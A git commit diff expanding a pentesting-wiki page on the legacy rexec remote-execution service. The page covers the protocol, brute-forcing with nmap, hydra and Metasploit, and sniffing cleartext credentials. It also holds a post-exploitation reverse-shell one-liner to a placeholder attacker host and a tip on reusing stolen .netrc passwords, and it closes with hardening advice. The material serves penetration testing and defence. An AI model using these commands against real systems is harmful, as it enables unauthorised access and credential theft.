Merge pull request #1126 from HackTricks-wiki/research_update_src_network-services-pentesting_512-pentesting-rexec_20250715_014239

carlospolop · web-flow · commit 7caff39176ca · 2025-07-16T00:01:47.000+02:00
Research Update Enhanced src/network-services-pentesting/512...
diff --git a/src/network-services-pentesting/512-pentesting-rexec.md b/src/network-services-pentesting/512-pentesting-rexec.md
@@ -2,22 +2,115 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-
 ## Basic Information
 
-It is a service that **allows you to execute a command inside a host** if you know valid **credentials** (username and password).
+Rexec (remote **exec**) is one of the original Berkeley *r*-services suite (together with `rlogin`, `rsh`, …).  It provides a **remote command-execution** capability **authenticated only with a clear-text username and password**.  The protocol was defined in the early 1980’s (see RFC 1060) and is nowadays considered **insecure by design**.  Nevertheless it is still enabled by default in some legacy UNIX / network-attached equipment and occasionally shows up during internal pentests.
 
-**Default Port:** 512
+**Default Port:** TCP 512 (`exec`)
 
 ```
 PORT    STATE SERVICE
 512/tcp open  exec
 ```
 
+> 🔥  All traffic – including credentials – is transmitted **unencrypted**.  Anyone with the ability to sniff the network can recover the username, password and command.
+
+### Protocol quick-look
+
+1. Client connects to TCP 512.
+2. Client sends three **NUL-terminated** strings:
+   * the port number (as ASCII) where it wishes to receive stdout/stderr (often `0`),
+   * the **username**,
+   * the **password**.
+3. A final NUL-terminated string with the **command** to execute is sent.
+4. The server replies with a single 8-bit status byte (0 = success, `1` = failure) followed by the command output.
+
+That means you can reproduce the exchange with nothing more than `echo -e` and `nc`:
+
+```bash
+(echo -ne "0\0user\0password\0id\0"; cat) | nc <target> 512
+```
+
+If the credentials are valid you will receive the output of `id` straight back on the same connection.
+
+### Manual usage with the client
+
+Many Linux distributions still ship the legacy client inside the **inetutils-rexec** / **rsh-client** package:
+
+```bash
+rexec -l user -p password <target> "uname -a"
+```
+
+If `-p` is omitted the client will prompt interactively for the password (visible on the wire in clear-text!).
+
+---
+## Enumeration & Brute-forcing
+
 ### [**Brute-force**](../generic-hacking/brute-force.md#rexec)
 
+### Nmap
 
-{{#include ../banners/hacktricks-training.md}}
+```bash
+nmap -p 512 --script rexec-info <target>
+# Discover service banner and test for stdout port mis-configuration
+
+nmap -p 512 --script rexec-brute --script-args "userdb=users.txt,passdb=rockyou.txt" <target>
+```
+The `rexec-brute` NSE uses the protocol described above to try credentials very quickly .
 
+### Hydra / Medusa / Ncrack
 
+```bash
+hydra -L users.txt -P passwords.txt rexec://<target> -s 512 -t 8
+```
+`hydra` has a dedicated **rexec** module and remains the fastest offline bruteforcer .  `medusa` (`-M REXEC`) and `ncrack` (`rexec` module) can be used in the same way.
 
+### Metasploit
+
+```
+use auxiliary/scanner/rservices/rexec_login
+set RHOSTS <target>
+set USER_FILE users.txt
+set PASS_FILE passwords.txt
+run
+```
+The module will spawn a shell on success and store the credentials in the database .
+
+---
+## Sniffing credentials
+
+Because everything is clear-text, **network captures are priceless**.  With a copy of the traffic you can extract creds without touching the target:
+
+```bash
+tshark -r traffic.pcap -Y 'tcp.port == 512' -T fields -e data.decoded | \
+  awk -F"\\0" '{print $2":"$3" -> "$4}'  # username:password -> command
+```
+
+(In Wireshark enable *Decode As …​* TCP 512 → REXEC to view nicely-parsed fields.)
+
+---
+## Post-Exploitation tips
+
+* Commands run with the privileges of the supplied user.  If `/etc/pam.d/rexec` is mis-configured (e.g. `pam_rootok`), root shells are sometimes possible.
+* Rexec ignores the user’s shell and executes the command via `/bin/sh -c <cmd>`.  You can therefore use typical shell-escape tricks (`;`, ``$( )``, backticks) to chain multiple commands or spawn reverse shells:
+  ```bash
+  rexec -l user -p pass <target> 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'
+  ```
+* Passwords are often stored in **~/.netrc** on other systems; if you compromise one host you may reuse them for lateral movement.
+
+---
+## Hardening / Detection
+
+* **Do not expose rexec**; replace it with SSH.  Virtually all modern *inetd* superservers comment the service out by default.
+* If you must keep it, restrict access with TCP wrappers (`/etc/hosts.allow`) or firewall rules and enforce strong per-account passwords.
+* Monitor for traffic to :512 and for `rexecd` process launches.  A single packet capture is enough to detect a compromise.
+* Disable `rexec`, `rlogin`, `rsh` together – they share most of the same codebase and weaknesses.
+
+---
+
+
+## References
+
+* Nmap NSE `rexec-brute` documentation – [https://nmap.org/nsedoc/scripts/rexec-brute.html](https://nmap.org/nsedoc/scripts/rexec-brute.html)
+* Rapid7 Metasploit module `auxiliary/scanner/rservices/rexec_login` – [https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login](https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login)
+{{#include ../banners/hacktricks-training.md}}
